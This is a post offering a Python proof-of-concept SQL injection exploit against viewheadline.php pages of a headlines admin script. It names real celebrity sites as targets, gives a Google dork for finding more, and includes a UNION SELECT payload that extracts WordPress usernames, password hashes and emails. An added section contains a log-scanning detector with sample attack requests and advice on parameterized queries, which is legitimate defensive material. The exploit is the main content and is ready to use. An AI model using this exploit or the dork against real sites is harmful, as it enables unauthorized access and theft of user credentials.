PoC - PHP GroupWare Headlines Admin SQLi
Here's a PoC for some SQL injection which affects a bunch of sites dedicated to dead celebrities, some examples include:
  • Malcolm X
  • Marilyn Monroe
  • Andre The Giant
  • Jean Harlow
  • Ella Fitzgerald
and more.

For a full list of sites, the following Google dork will work: inurl:viewheadline.php?id=

from sys import argv, exit
from urllib import urlopen
from re import findall

if len(argv) < 2:
    exit('Usage: python file.py http://vulnsite.com/path/')
print "\n// P0ISON.ORG // POC // 17/1/2015 // \n\n"
payload = 'viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,concat(user_login,0x3a,user_pass,0x3a,user_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from wp_users--+'
arg = argv[1]
if arg[0:7] != "http://":
    url = "http://" + str(arg)
else:
    url = arg
data = urlopen(url + str(payload)).read()
matches = findall(r"<span class=\"newstitle\">(.*?)</span>", data)
for match in matches:
    x = match.split(":")
    print "User: " + str(x[0]) + " | Password: " + str(x[1]) + " | E-mail: " + str(x[2]) + "\n"

Something funny to note is that the admin hash and usernames of admin accounts are the SAME for all affected websites. In addition to this, the column count is static, so the PoC will work the same for all affected sites without need for modifications to the source or a method for determining the column count.
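For site operators, an added detection example (not part of the original post): because the `id` parameter of `viewheadline.php` should only ever be an integer, any request where it decodes to something else is worth flagging in the web server access log. The log lines, IP addresses and function name below are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Jan/2015:10:01:02 +0000] "GET /viewheadline.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jan/2015:10:01:05 +0000] "GET /viewheadline.php?id=-9%27%20union%20select%201,2,3%20from%20wp_users--+ HTTP/1.1" 200 6010 "-" "Python-urllib/1.17"
198.51.100.7 - - [17/Jan/2015:10:01:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jan/2015:10:01:11 +0000] "GET /news/viewheadline.php?id=7%20OR%201=1 HTTP/1.1" 200 5300 "-" "curl/7.38"
"""

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_SELECT = re.compile(r"(?i)\bunion\b.*?\bselect\b")
INTEGER = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client, decoded_id, reason) for every viewheadline.php
    request whose id parameter is not a plain non-negative integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/viewheadline.php"):
            continue
        # parse_qs percent-decodes values, so %27 and %20 are seen as ' and space.
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            if INTEGER.fullmatch(value):
                continue
            reason = "union-select" if UNION_SELECT.search(value) else "non-integer-id"
            findings.append((client, value, reason))
    return findings


if __name__ == "__main__":
    for client, value, reason in suspicious_requests(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value!r}")
```

The same integer-only rule belongs in the application itself: cast or validate `id` before it reaches the query and use a parameterized statement, so the log check is a backstop rather than the only control.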
